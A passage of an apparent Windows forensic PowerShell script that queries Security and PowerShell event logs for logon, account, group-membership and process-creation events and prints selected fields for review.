| } 360 | elseif($using:eventID -eq 4648) 361 | { 362 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4648) - A logon was attempted using explicit credentials" 363 | #Get-EventLog -Newest $newest -LogName Security -Instanceid 4648 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name= "Original Account SID";Expression={$_.ReplacementStrings[0]}},@{Name="Original Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="Original Account Domain";Expression={$_.ReplacementStrings[2]}},@{Name="Original Account Logon ID";Expression={$_.ReplacementStrings[3]}},@{Name="RunAs Account Name";Expression={$_.ReplacementStrings[5]}},@{Name="RunAs Account Domain";Expression={$_.ReplacementStrings[6]}},@{Name="Target Server Name";Expression={$_.ReplacementStrings[8]}},@{Name="Additional Information";Expression={$_.ReplacementStrings[9]}},@{Name="Process ID";Expression={$_.ReplacementStrings[10]}},@{Name="Process Name";Expression={$_.ReplacementStrings[11]}},@{Name="Network Address";Expression={$_.ReplacementStrings[12]}},@{Name="Network"; Expression={$_.ReplacementStrings[13]}} 364 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4648 | Select -Property TimeGenerated,MachineName,@{Name= "Original Account SID";Expression={$_.ReplacementStrings[0]}},@{Name="Original Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="Original Account Domain";Expression={$_.ReplacementStrings[2]}},@{Name="Original Account Logon ID";Expression={$_.ReplacementStrings[3]}},@{Name="RunAs Account Name";Expression={$_.ReplacementStrings[5]}},@{Name="RunAs Account Domain";Expression={$_.ReplacementStrings[6]}},@{Name="Target Server Name";Expression={$_.ReplacementStrings[8]}},@{Name="Additional Information";Expression={$_.ReplacementStrings[9]}},@{Name="Process ID";Expression={$_.ReplacementStrings[10]}},@{Name="Process Name";Expression={$_.ReplacementStrings[11]}},@{Name="Network Address";Expression={$_.ReplacementStrings[12]}},@{Name="Network"; Expression={$_.ReplacementStrings[13]}} 365 | } 366 | elseif($using:eventID -eq 4732) 367 | { 368 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4732) - A member was added to a security-enabled local group" 369 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4732 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="AccountName";Expression={$_.ReplacementStrings[6]}},@{Name="Added User (SPN)";Expression={$_.ReplacementStrings[0]}},@{Name="Added User SID";Expression={$_.ReplacementStrings[1]}},@{Name="GroupName";Expression={$_.ReplacementStrings[2]}},@{Name="Group SID";Expression={$_.ReplacementStrings[4]}} 370 | 371 | } 372 | elseif($using:eventID -eq 4733) 373 | { 374 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4733) - A member was removed from a security-enabled local group" 375 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4733 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="AccountName";Expression={$_.ReplacementStrings[6]}},@{Name="Removed User (SPN)";Expression={$_.ReplacementStrings[0]}},@{Name="Removed User SID";Expression={$_.ReplacementStrings[1]}},@{Name="GroupName";Expression={$_.ReplacementStrings[2]}},@{Name="Group SID";Expression={$_.ReplacementStrings[4]}} 376 | 377 | } 378 | elseif($using:eventID -eq 4756) 379 | { 380 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4756) - A member was added to a security-enabled universal group" 381 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4756 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="AccountName";Expression={$_.ReplacementStrings[6]}},@{Name="Added User (SPN)";Expression={$_.ReplacementStrings[0]}},@{Name="Added User SID";Expression={$_.ReplacementStrings[1]}},@{Name="GroupName";Expression={$_.ReplacementStrings[2]}},@{Name="Group SID";Expression={$_.ReplacementStrings[4]}} 382 | } 383 | elseif($using:eventID -eq 4757) 384 | { 385 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4757) - A member was removed from a security-enabled universal group" 386 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4757 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="AccountName";Expression={$_.ReplacementStrings[6]}},@{Name="Added User (SPN)";Expression={$_.ReplacementStrings[0]}},@{Name="Added User SID";Expression={$_.ReplacementStrings[1]}},@{Name="GroupName";Expression={$_.ReplacementStrings[2]}},@{Name="Group SID";Expression={$_.ReplacementStrings[4]}} 387 | 388 | } 389 | elseif($using:eventID -eq 4776) 390 | { 391 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4776) - The domain controller attempted to validate the credentials for an account" 392 | $get4776=Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4776 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,PSComputerName,MachineName,@{Name="Logon Account";Expression={$_.ReplacementStrings[1]}},@{Name="ComputerName (Source)";Expression={$_.ReplacementStrings[2]}}#,@{Name="Error Type";Expression={$_.ReplacementStrings[3]}} 393 | Write-Output "`n" 394 | for($x=0;$x -lt $get4776.length; $x++) 395 | { 396 | Write-Host "Account Name:"$get4776[$x]."Logon Account" "| Source:"$get4776[$x].'ComputerName (Source)' "| Destination:"$get4776[$x].MachineName "| "$get4776[$x].TimeGenerated 397 | } 398 | } 399 | elseif($using:eventID -eq 4688) 400 | { 401 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4688) - A new process has been created" 402 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4688 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property index,TimeGenerated,MachineName,@{Name="Creator SID";Expression={$_.ReplacementStrings[0]}},@{Name="Creator Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="Target SID";Expression={$_.ReplacementStrings[9]}},@{Name="Target Account Name";Expression={$_.ReplacementStrings[10]}},@{Name="Target Account Domain";Expression={$_.ReplacementStrings[11]}},@{Name="Token Elevation Type";Expression={if($_.ReplacementStrings[6] -eq "%%1936"){ "full token - User Account Control is disabled" }elseif($_.ReplacementStrings[6] -eq "%%1937"){ "elevated token - User Account Control is enabled, program executed Run as administrator" }else{ "normal value - UAC is enabled, user starts a program from the Start Menu" }}},@{Name="Creator Process Name";Expression={$_.ReplacementStrings[13]}},@{Name="New Process Name";Expression={$_.ReplacementStrings[5]}} 403 | } 404 | elseif($using:eventID -eq 5136) 405 | { 406 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (5136) - A Directory Process Object was Modified" 407 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 5136 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="AccountToObject";Expression={$_.ReplacementStrings[3]}},@{Name="SID";Expression={$_.ReplacementStrings[2]}},@{Name="Object";Expression={$_.ReplacementStrings[8]}},@{Name="ObjectGUID";Expression={$_.ReplacementStrings[9]}},@{Name="Class";Expression={$_.ReplacementStrings[10]}},@{Name="Type";Expression={$_.ReplacementStrings[14]}},@{Name="LDAP Display Name";Expression={$_.ReplacementStrings[11]}},@{Name="LDAP Value";Expression={$_.ReplacementStrings[13]}} 408 | } 409 | elseif(($using:eventID -eq 400) -or ($using:eventID -eq 600)) 410 | { 411 | if($using:eventID -eq 400) 412 | { 413 | $event400_600=400 414 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (400) - Windows PowerShell" 415 | Write-Output "`n" 416 | } 417 | else 418 | { 419 | $event400_600=600 420 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (600) - Windows PowerShell" 421 | Write-Output "`n" 422 | } 423 | 424 | try 425 | { 426 | $get400_600=Get-EventLog -Newest $using:newest -InstanceId $event400_600 -LogName "Windows Powershell" -ErrorAction Stop | select TimeGenerated,@{Name="HostApplication";Expression={$_.ReplacementStrings[2]}} | select TimeGenerated,HostApplication 427 | 428 | if(($get400_600 | Measure-Object).count -gt 0) 429 | { 430 | $timeGenerated=($get400_600.TimeGenerated).DateTime 431 | $hostApplication=($get400_600.HostApplication | findstr -i "HostApplication") 432 | $engineVersion=($get400_600.HostApplication | findstr -i "EngineVersion") 433 | #$hostPSVersion=Get-Host | Select Version 434 | 435 | 436 | for($c=0;$c -lt $get400_600.length;$c++) 437 | { 438 | if($hostApplication[$c].Split("=") -ne "") 439 | { 440 | Write-Host $timeGenerated[$c] 441 | #Write-Host "Host PowerShell: "$hostPSVersion.Version 442 | Write-Host $hostApplication[$c].Split("=")[1] 443 | if($engineVersion[$c].split("=")[1] -eq "") 444 | { 445 | Write-Host "Command PS Version: -" 446 | } 447 | else 448 | { 449 | Write-Host "Command PS Version:"$engineVersion[$c].split("=")[1] 450 | } 451 | Write-Output "`n" 452 | 453 | } 454 | } 455 | } 456 | else 457 | { 458 | <# #> 459 | } 460 | } 461 | catch 462 | { 463 | <# Try/Catch event 400/600#> 464 | } 465 | 466 | } 467 | elseif(($using:eventID -eq 500) -or ($using:eventID -eq 501)) 468 | { 469 | if($using:eventID -eq 500) 470 | { 471 | $event500_501=500 472 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (500) - Windows PowerShell" 473 | Write-Output "`n" 474 | } 475 | else 476 | { 477 | $event500_501=501 478 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (501) - Windows PowerShell" 479 | Write-Output "`n" 480 | } 481 | 482 | try 483 | { 484 | $get500_501=Get-EventLog -Newest $using:newest -InstanceId $event500_501 -LogName "Windows Powershell" | select TimeGenerated,PSComputerName,@{Name="Command";Expression={$_.ReplacementStrings[2]}} | select TimeGenerated,PSComputerName,Command 485 | 486 | 487 | if(($get500_501 | Measure-Object).count -gt 0) 488 | { 489 | $timeGenerated=($get500_501 | Select TimeGenerated) 490 | #$psComputerName=$get500_501.PsComputerName 491 | $commandPath=($get500_501 | Select Command) | format-List | findstr -i "CommandPath" 492 | $commandName=($get500_501 | Select Command) | format-List | findstr -i "CommandName" 493 | $commandType=($get500_501 | Select Command) | format-List | findstr -i "CommandType" 494 | $commandLine=($get500_501 | Select Command) | format-List | findstr -i "CommandLine" 495 | $engineVersion=($get500_501 | Select Command) | format-list | findstr -i "EngineVersion" 496 | 497 | 498 | 499 | 500 | for($c=0;$c -lt $get500_501.length;$c++) 501 | { 502 | 503 | if($commandLine[$c].Split("=") -ne "") 504 | { 505 | 506 | Write-Host $timeGenerated[$c] 507 | #Write-Host $psComputerName[$c] 508 | if($commandName[$c].split("=")[1] -eq ""){Write-Host "CommandName: -"}else{Write-Host "CommandName: "$commandName[$c].split("=")[1].Trim(" ")} 509 | if($commandType[$c].split("=")[1] -eq ""){Write-Host "CommandType: -"}else{Write-Host "CommandType: "$commandType[$c].split("=")[1].Trim(" ")} 510 | if($commandPath[$c].split("=")[1] -eq ""){Write-Host "CommandPath: -"}else{Write-Host "CommandPath: "$commandPath[$c].split("=")[1].Trim(" ")} 511 | if($commandLine[$c].split("=")[1] -eq ""){Write-Host "CommandLine: -"}else{Write-Host "CommandLine: "($commandLine[$c].split("=")[1]).Trim(" ")} 512 | if($engineVersion[$c].split("=")[1] -eq ""){Write-Host "Command PS Version: -"}else{Write-Host "Command PS Version:"$engineVersion[$c].split("=")[1]} 513 | Write-Output "`n" 514 | 515 | } 516 | else 517 | { 518 | <# #> 519 | } 520 | 521 | } 522 | } 523 | } 524 | catch 525 | { 526 | <# Try/Catch event 500/501#> 527 | } 528 | 529 | } 530 | elseif(($using:eventID -eq 4728) -or ($using:eventID -eq 4729)) 531 | { 532 | if($using:eventID -eq 4728) 533 | { 534 | $event4728_29=4728 535 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID 4728 - A member was added to a security-enabled global group" 536 | $groupHistory=Get-EventLog -Newest $using:newest -LogName Security -Instanceid $event4728_29 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,@{Name="Account Name";Expression={$_.ReplacementStrings[0]}},@{Name="Security ID ";Expression={$_.ReplacementStrings[1]}}, @{Name="Added to Security Group";Expression={$_.ReplacementStrings[2]}} 537 | 538 | } 539 | else 540 | { 541 | $event4728_29=4729 542 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID 4729 - A member was removed from a security-enabled global group" 543 | $groupHistory=Get-EventLog -Newest $using:newest -LogName Security -Instanceid $event4728_29 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,@{Name="Account Name";Expression={$_.ReplacementStrings[0]}},@{Name="Security ID ";Expression={$_.ReplacementStrings[1]}}, @{Name="Removed from a Security Group";Expression={$_.ReplacementStrings[2]}} 544 | 545 | } 546 | 547 | #Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4728 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,@{Name="Account Name";Expression={$_.ReplacementStrings[0]}},@{Name="Security ID ";Expression={$_.ReplacementStrings[1]}}, @{Name="Added to Security Group";Expression={$_.ReplacementStrings[2]}} | Format-Table -AutoSize 548 | #$using:newest 549 | #[wmi] "win32_userAccount.Domain='hackme',Name='war'" | select -property sid 550 | $groupUsers=$groupHistory | Group-Object {$_."Account Name"} | Select -Property name,group 551 | 552 | #$groupHistory | Group-Object {$_."Account Name"} | Where-object {$_.Name -match "CN=$groupUsers"} | %{$_.Group} | Select -Property "Added to Security Group" 553 | #loop 554 | $mySIDarray=New-Object System.Collections.ArrayList 555 | 556 | #Add unique SIDs to array 557 | for($sidcounter=0;$sidcounter -lt $groupHistory.length; $sidcounter++) 558 | { 559 | if($mySIDarray -notcontains ($groupHistory[$sidcounter] | Select -Property "Security ID ")."Security ID ") 560 | { 561 | #https://learn-powershell.net/2014/09/13/quick-hits-sending-data-to-null/ 562 | $mySIDarray.add(($groupHistory[$sidcounter] | Select -Property "Security ID ")."Security ID ") | Out-Null 563 | } 564 | } 565 | 566 | for($c=0;$c -lt $groupUsers.length;$c++) 567 | { 568 | 569 | $userscn=$groupUsers[$c].Name 570 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Enumerating $userscn group history" 571 | $groupHistory | Group-Object {$_."Account Name"} | Where-object {$_.Name -match "$userscn"} | %{$_.Group} | Format-Table #| Select -Property "Added to Security Group" 572 | Write-Output "`n" 573 | Write-Host "[*] " -ForegroundColor Yellow -Nonewline; Write-Output "Extra Information ..." 574 | #Convert SID to username and get user groups,comments 575 | $userSID=$mySIDarray[$c] 576 | $accountName=([wmi]"win32_SID.SID='$userSID'").AccountName 577 | $userBelongToGroups=Invoke-Command -ScriptBlock {net user $accountName /domain | Select-String "Global Group"} 578 | $userComment=Invoke-Command -ScriptBlock {net user $accountName /domain | Select-String -Pattern "^comment"} 579 | Write-Output "Username> $accountName" 580 | Write-Host "[!] User is currently belong to> $userBelongToGroups" -ForegroundColor Green 581 | Write-Host "$userComment" -ForegroundColor Red 582 | Write-Output "`n" 583 | 584 | } 585 | 586 | 587 | 588 | } 589 | else <# Executing all event logs if the user doesn't specify one #> 590 | { 591 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4624) - An account was successfully logged on" 592 | 593 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4624 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[5]}},@{Name="SourceIP";Expression={$_.ReplacementStrings[18]}},@{Name="SourcePort";Expression={$_.ReplacementStrings[19]}} 594 | 595 | 596 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4625) - An account failed to log on" 597 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4625 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[5]}},@{Name="SourceIP";Expression={$_.ReplacementStrings[19]}},@{Name="SourcePort";Expression={$_.ReplacementStrings[20]}} 598 | 599 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4634) - An account was logged off" 600 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4634 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[1]}},@{Name="Security ID";Expression={$_.ReplacementStrings[0]}} 601 | 602 | 603 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4647) - User initiated logoff" 604 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4647 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[1]}} | Format-Table -Property TimeGenerated,Username,MachineName 605 | 606 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4648) - A logon was attempted using explicit credentials" 607 | #Get-EventLog -Newest $newest -LogName Security -Instanceid 4648 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name= "Original Account SID";Expression={$_.ReplacementStrings[0]}},@{Name="Original Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="Original Account Domain";Expression={$_.ReplacementStrings[2]}},@{Name="Original Account Logon ID";Expression={$_.ReplacementStrings[3]}},@{Name="RunAs Account Name";Expression={$_.ReplacementStrings[5]}},@{Name="RunAs Account Domain";Expression={$_.ReplacementStrings[6]}},@{Name="Target Server Name";Expression={$_.ReplacementStrings[8]}},@{Name="Additional Information";Expression={$_.ReplacementStrings[9]}},@{Name="Process ID";Expression={$_.ReplacementStrings[10]}},@{Name="Process Name";Expression={$_.ReplacementStrings[11]}},@{Name="Network Address";Expression={$_.ReplacementStrings[12]}},@{Name="Network"; Expression={$_.ReplacementStrings[13]}} 608 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4648 | Select -Property TimeGenerated,MachineName,@{Name= "Original Account SID";Expression={$_.ReplacementStrings[0]}},@{Name="Original Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="Original Account Domain";Expression={$_.ReplacementStrings[2]}},@{Name="Original Account Logon ID";Expression={$_.ReplacementStrings[3]}},@{Name="RunAs Account Name";Expression={$_.ReplacementStrings[5]}},@{Name="RunAs Account Domain";Expression={$_.ReplacementStrings[6]}},@{Name="Target Server Name";Expression={$_.ReplacementStrings[8]}},@{Name="Additional Information";Expression={$_.ReplacementStrings[9]}},@{Name="Process ID";Expression={$_.ReplacementStrings[10]}},@{Name="Process Name";Expression={$_.ReplacementStrings[11]}},@{Name="Network Address";Expression={$_.ReplacementStrings[12]}},@{Name="Network"; Expression={$_.ReplacementStrings[13]}} 609 | 610 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4720) - A user account was created" 611 | #Get-EventLog -Newest $newest -LogName Security -Instanceid 4720 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="Created Account Name";Expression={$_.ReplacementStrings[0]}},@{Name="Created Account Domain";Expression={$_.ReplacementStrings[1]}},@{Name="Created Account SID";Expression={$_.ReplacementStrings[2]}},@{Name="Account SID Performed Changes";Expression={$_.ReplacementStrings[3]}},@{Name="Account Name Performed Changes";Expression={$_.ReplacementStrings[4]}},@{Name="Account Domain Performed Changes";Expression={$_.ReplacementStrings[5]}},@{Name="Account Logon ID Performed Changes";Expression={$_.ReplacementStrings[6]}},@{Name="SAM Account Name";Expression={$_.ReplacementStrings[8]}},@{Name="Display Name";Expression={$_.ReplacementStrings[9]}},@{Name="User Principal Name";Expression={$_.ReplacementStrings[10]}},@{Name="Primary Group ID";Expression={$_.ReplacementStrings[18]}} 612 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4720 | Select -Property TimeGenerated,MachineName,@{Name="Created Account Name";Expression={$_.ReplacementStrings[0]}},@{Name="Created Account Domain";Expression={$_.ReplacementStrings[1]}},@{Name="Created Account SID";Expression={$_.ReplacementStrings[2]}},@{Name="Account SID Performed Changes";Expression={$_.ReplacementStrings[3]}},@{Name="Account Name Performed Changes";Expression={$_.ReplacementStrings[4]}},@{Name="Account Domain Performed Changes";Expression={$_.ReplacementStrings[5]}},@{Name="Account Logon ID Performed Changes";Expression={$_.ReplacementStrings[6]}},@{Name="SAM Account Name";Expression={$_.ReplacementStrings[8]}},@{Name="Display Name";Expression={$_.ReplacementStrings[9]}},@{Name="User Principal Name";Expression={$_.ReplacementStrings[10]}},@{Name="Primary Group ID";Expression={$_.ReplacementStrings[18]}} 613 | 614 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4732) - A member was added to a security-enabled local group" 615 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4732 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="AccountName";Expression={$_.ReplacementStrings[6]}},@{Name="Added User SPN";Expression={$_.ReplacementStrings[0]}},@{Name="Added User SID";Expression={$_.ReplacementStrings[1]}},@{Name="GroupName";Expression={$_.ReplacementStrings[2]}},@{Name="Group SID";Expression={$_.ReplacementStrings[4]}} 616 | 617 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4733) - A member was removed from a security-enabled local group" 618 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4733 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="AccountName";Expression={$_.ReplacementStrings[6]}},@{Name="Added User SPN";Expression={$_.ReplacementStrings[0]}},@{Name="Added User SID";Expression={$_.ReplacementStrings[1]}},@{Name="GroupName";Expression={$_.ReplacementStrings[2]}},@{Name="Group SID";Expression={$_.ReplacementStrings[4]}} 619 | 620 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4738) - A user account was changed" 621 | #Get-EventLog -Newest $newest -LogName Security -Instanceid 4738 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="Changed Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="Changed Account Domain";Expression={$_.ReplacementStrings[2]}},@{Name="Changed Account SID";Expression={$_.ReplacementStrings[3]}},@{Name="Account SID Performed Changes";Expression={$_.ReplacementStrings[4]}},@{Name="Account Name Performed Changes";Expression={$_.ReplacementStrings[5]}},@{Name="Account Domain Performed Changes";Expression={$_.ReplacementStrings[6]}},@{Name="Account Logon ID Performed Changes";Expression={$_.ReplacementStrings[7]}},@{Name="SAM Account Name";Expression={$_.ReplacementStrings[9]}},@{Name="Display Name";Expression={$_.ReplacementStrings[10]}},@{Name="User Principal Name";Expression={$_.ReplacementStrings[11]}},@{Name="Primary Group ID";Expression={$_.ReplacementStrings[19]}} 622 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4738 | Select -Property TimeGenerated,MachineName,@{Name="Changed Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="Changed Account Domain";Expression={$_.ReplacementStrings[2]}},@{Name="Changed Account SID";Expression={$_.ReplacementStrings[3]}},@{Name="Account SID Performed Changes";Expression={$_.ReplacementStrings[4]}},@{Name="Account Name Performed Changes";Expression={$_.ReplacementStrings[5]}},@{Name="Account Domain Performed Changes";Expression={$_.ReplacementStrings[6]}},@{Name="Account Logon ID Performed Changes";Expression={$_.ReplacementStrings[7]}},@{Name="SAM Account Name";Expression={$_.ReplacementStrings[9]}},@{Name="Display Name";Expression={$_.ReplacementStrings[10]}},@{Name="User Principal Name";Expression={$_.ReplacementStrings[11]}},@{Name="Primary Group ID";Expression={$_.ReplacementStrings[19]}} 623 | 624 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4776) - The domain controller attempted to validate the credentials for an account" 625 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4776 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,PSComputerName,MachineName,@{Name="Logon Account";Expression={$_.ReplacementStrings[1]}},@{Name="ComputerName (Source)";Expression={$_.ReplacementStrings[2]}},@{Name="Error Type";Expression={$_.ReplacementStrings[3]}} 626 | 627 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4688) - A new process has been created" 628 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4688 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property index,TimeGenerated,MachineName,@{Name="Creator SID";Expression={$_.ReplacementStrings[0]}},@{Name="Creator Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="Target SID";Expression={$_.ReplacementStrings[9]}},@{Name="Target Account Name";Expression={$_.ReplacementStrings[10]}},@{Name="Target Account Domain";Expression={$_.ReplacementStrings[11]}},@{Name="Token Elevation Type";Expression={if($_.ReplacementStrings[6] -eq "%%1936"){ "full token - User Account Control is disabled" }elseif($_.ReplacementStrings[6] -eq "%%1937"){ "elevated token - User Account Control is enabled, program executed Run as administrator" }else{ "normal value - UAC is enabled, user starts a program from the Start Menu" }}},@{Name="Creator Process Name";Expression={$_.ReplacementStrings[13]}},@{Name="New Process Name";Expression={$_.ReplacementStrings[5]}} 629 | 630 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4756) - A member was added to a security-enabled universal group" 631 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4756 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="AccountName";Expression={$_.ReplacementStrings[6]}},@{Name="Added User SPN";Expression={$_.ReplacementStrings[0]}},@{Name="Added User SID";Expression={$_.ReplacementStrings[1]}},@{Name="GroupName";Expression={$_.ReplacementStrings[2]}},@{Name="Group SID";Expression={$_.ReplacementStrings[4]}} 632 | 633 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4757) - A member was removed from a security-enabled universal group" 634 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4757 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="AccountName";Expression={$_.ReplacementStrings[6]}},@{Name="Added User SPN";Expression={$_.ReplacementStrings[0]}},@{Name="Added User SID";Expression={$_.ReplacementStrings[1]}},@{Name="GroupName";Expression={$_.ReplacementStrings[2]}},@{Name="Group SID";Expression={$_.ReplacementStrings[4]}} 635 | 636 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (5136) - A Directory Process Object was Modified" 637 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 5136 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="AccountToObject";Expression={$_.ReplacementStrings[3]}},@{Name="SID";Expression={$_.ReplacementStrings[2]}},@{Name="Object";Expression={$_.ReplacementStrings[8]}},@{Name="ObjectGUID";Expression={$_.ReplacementStrings[9]}},@{Name="Class";Expression={$_.ReplacementStrings[10]}},@{Name="Type";Expression={$_.ReplacementStrings[14]}},@{Name="LDAP Display Name";Expression={$_.ReplacementStrings[11]}},@{Name="LDAP Value";Expression={$_.ReplacementStrings[13]}} 638 | 639 | $event4728_29_array=@(4728,4729) 640 | foreach($event4728_29 in $event4728_29_array) 641 | { 642 | if($event4728_29 -eq 4728) 643 | { 644 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4728) - A member was added to a security-enabled global group" 645 | $groupHistory=Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4728 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,@{Name="Account Name";Expression={$_.ReplacementStrings[0]}},@{Name="Security ID ";Expression={$_.ReplacementStrings[1]}}, @{Name="Added to Security Group";Expression={$_.ReplacementStrings[2]}} 646 | } 647 | else 648 | { 649 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4729) - A member was removed from a security-enabled global group" 650 | $groupHistory=Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4729 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,@{Name="Account Name";Expression={$_.ReplacementStrings[0]}},@{Name="Security ID ";Expression={$_.ReplacementStrings[1]}}, @{Name="Removed from a Security Group";Expression={$_.ReplacementStrings[2]}} 651 | 652 | } 653 | $groupUsers=$groupHistory | Group-Object {$_."Account Name"} | Select -Property name,group 654 | 655 | $mySIDarray=New-Object System.Collections.ArrayList 656 | 657 | #Add unique SIDs to array 658 | for($sidcounter=0;$sidcounter -lt $groupHistory.length; $sidcounter++) 659 | { 660 | if($mySIDarray -notcontains ($groupHistory[$sidcounter] | Select -Property "Security ID ")."Security ID ") 661 | { 662 | #https://learn-powershell.net/2014/09/13/quick-hits-sending-data-to-null/ 663 | $mySIDarray.add(($groupHistory[$sidcounter] | Select -Property "Security ID ")."Security ID ") | Out-Null 664 | } 665 | } 666 | 667 | for($c=0;$c -lt $groupUsers.length;$c++) 668 | { 669 | 670 | $userscn=$groupUsers[$c].Name 671 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Enumerating $userscn group history" 672 | $groupHistory | Group-Object {$_."Account Name"} | Where-object {$_.Name -match "$userscn"} | %{$_.Group} | Format-Table #| Select -Property "Added to Security Group" 673 | Write-Output "`n" 674 | Write-Host "[*] " -ForegroundColor Yellow -Nonewline; Write-Output "Extra Information ..." 675 | #Convert SID to username and get user groups,comments 676 | $userSID=$mySIDarray[$c] 677 | 